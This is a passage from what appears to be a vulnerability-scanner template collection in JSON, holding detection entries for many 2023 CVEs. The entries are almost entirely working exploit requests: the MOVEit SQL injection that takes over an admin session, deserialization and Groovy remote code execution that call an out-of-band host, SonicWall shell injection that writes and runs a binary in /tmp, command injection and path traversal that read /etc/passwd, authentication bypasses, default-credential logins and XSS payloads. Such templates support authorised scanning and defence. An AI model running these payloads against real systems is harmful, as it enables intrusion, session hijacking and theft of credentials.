{{Hostname}}\n\nCMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/{{filename}});\n","GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(body_1, 'do_cmd.asp')","status_code_2 == 200","contains_all(body_2, 'www', 'www_multi')"],"condition":"and"}]}]},{"id":"CVE-2023-22518","info":{"name":"Atlassian Confluence Server - Improper Authorization","severity":"critical"},"requests":[{"raw":["POST /json/setup-restore.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7\nX-Atlassian-Token: no-check\n\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"buildIndex\"\n\nfalse\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"file\";filename=\"{{randstr}}.zip\"\n\n{{randstr}}\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"edit\"\n\nUpload and import\n------WebKitFormBoundaryT3yekvo0rGaL9QR7--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"],"condition":"and"}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2779","info":{"name":"Super Socializer < 7.13.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"facebook_urls\")"],"condition":"and"}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert('document.domain')>","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@oast.me\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40oast.me&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-2949","info":{"name":"OpenEMR < 7.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<img src=x onerror=alert(document.domain);>\", \"openemr\")"],"condition":"and"}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-4568","info":{"name":"PaperCut NG Unauthenticated XMLRPC Functionality","severity":"medium"},"requests":[{"raw":["POST /rpc/clients/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nContent-Type:text/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["conf.ssl-port","conf.auth-ttl-default"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-31465","info":{"name":"TimeKeeper by FSMLabs - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"seriesID\":"]}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-43208","info":{"name":"NextGen Healthcare Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n  <string>abcd</string>\n  <dynamic-proxy>\n    <interface>java.lang.Comparable</interface>\n    <handler class=\"org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler\">\n      <target class=\"org.apache.commons.collections4.functors.ChainedTransformer\">\n        <iTransformers>\n          <org.apache.commons.collections4.functors.ConstantTransformer>\n            <iConstant class=\"java-class\">java.lang.Runtime</iConstant>\n          </org.apache.commons.collections4.functors.ConstantTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>getMethod</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n              <java-class>[Ljava.lang.Class;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>getRuntime</string>\n              <java-class-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>invoke</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.Object</java-class>\n              <java-class>[Ljava.lang.Object;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <null/>\n              <object-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>exec</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>nslookup {{interactsh-url}}</string>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n        </iTransformers>\n      </target>\n      <methodName>transform</methodName>\n      <eventTypes>\n        <string>compareTo</string>\n      </eventTypes>\n    </handler>\n  </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-39796","info":{"name":"WBCE 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /modules/miniform/ajax_delete_message.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_1 == 200","contains(body, \"Record deleted successfully!\")"],"condition":"and"}]}]},{"id":"CVE-2023-6065","info":{"name":"Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Website Malware Scan Report","Scanned Website","Scan type"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40504","info":{"name":"LG Simple Editor <= v3.21.0 - Command Injection","severity":"critical"},"requests":[{"raw":["GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"LG Simple Editor\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadVideo\"; filename=\"{{filename}}.bmp\"\n\n/\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadPath\"\n\n/\"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../\"\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_x\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_width\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_height\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"fail\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: application/json\n\n{\"command\":\"cp\",\"option\":\"-f\",\"srcPath\":\"/{{filename}}_original.bmp\",\"destPath\":\"/{{filename}}.jsp\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"data\",\"success\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /simpleeditor/{{filename}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-44813","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["initInviteFriendBtn('model');alert(document.domain)//;"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34259","info":{"name":"Kyocera TASKalfa printer - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"server","words":["KM-MFP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26347","info":{"name":"Adobe Coldfusion - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wddxPacket version=","<string>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6567","info":{"name":"LearnPress <= 4.2.5.7 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(header, \"lp_session_guest=\", \"application/json\")","contains_all(body, \"status\\\":\\\"success\", \"No courses were found\")"],"condition":"and"}]}]},{"id":"CVE-2023-6021","info":{"name":"Ray API - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nodes?view=summary","{{BaseURL}}/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["root:.*:0:0:"]},{"type":"word","part":"header_2","words":["text/plain","aiohttp"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"nodeid","json":["..|objects|.nodeId//empty[0]"]}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"critical"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-5556","info":{"name":"Structurizr on-premises - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /signin HTTP/1.1\nHost: {{Hostname}}\n","POST /login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf={{csrf}}&hash=\n","GET /dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /workspace/create HTTP/1.1\nHost: {{Hostname}}\n","GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1\nHost: {{Hostname}}\n"],"attack":"pitchfork","payloads":{"username":["structurizr"],"password":["password"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<a href=\"/dashboard\">","Sign out"],"condition":"and"},{"type":"word","part":"body_5","words":["\");alert(document.domain);//","Structurizr"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"([0-9a-z-]+)\""],"internal":true},{"type":"regex","name":"workspace","group":1,"part":"header","regex":["\\/workspace\\/([0-9]+)\\?scriptNonce="],"internal":true}]}]},{"id":"CVE-2023-35161","info":{"name":"XWiki >= 6.2-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","DeleteApplication","data-xwiki"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-0777","info":{"name":"modoboa  2.0.4 - Admin TakeOver","severity":"critical"},"requests":[{"raw":["GET /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F\n","GET /dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["password"]},"attack":"pitchfork","host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"Dashboard\") && contains(body_3, \"Hello admin\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"header","name":"csrftoken","internal":true,"group":1,"regex":["csrftoken=([A-Za-z0-9]+)"]}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<title>SonicWall Universal Management Appliance</title>","<title>SonicWall Universal Management Host</title>"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-46805","info":{"name":"Ivanti ICS - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1\nHost: {{Hostname}}\n","GET /api/v1/cav/client/status/../../admin/options HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"build\")","contains(body_1, \"system-information\")","contains(body_1, \"software-inventory\")","contains(header_1, \"application/json\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"poll_interval\")","contains(body_2, \"block_message\")","contains(header_2, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45852","info":{"name":"Viessmann Vitogate 300 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"application/json\")","contains_all(body, \"traceroute: {{randstr}}: Unknown host\", \"daemon:x:1:1:\")"],"condition":"and"}]}]},{"id":"CVE-2023-6020","info":{"name":"Ray Static File - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/js/../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","aiohttp"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-51467","info":{"name":"Apache OFBiz < 18.12.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+{{interactsh-url}}'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-4113","info":{"name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Select Service(s)\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50968","info":{"name":"Apache OFBiz < 18.12.11 - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /partymgr/control/{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{parameter}}={\"http://{{interactsh-url}}/api\":\"{{str}}\"}\n"],"payloads":{"path":["getJSONuiLabel","getJSONuiLabelArray"],"parameter":["requiredLabel","requiredLabels"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-47246","info":{"name":"SysAid Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST 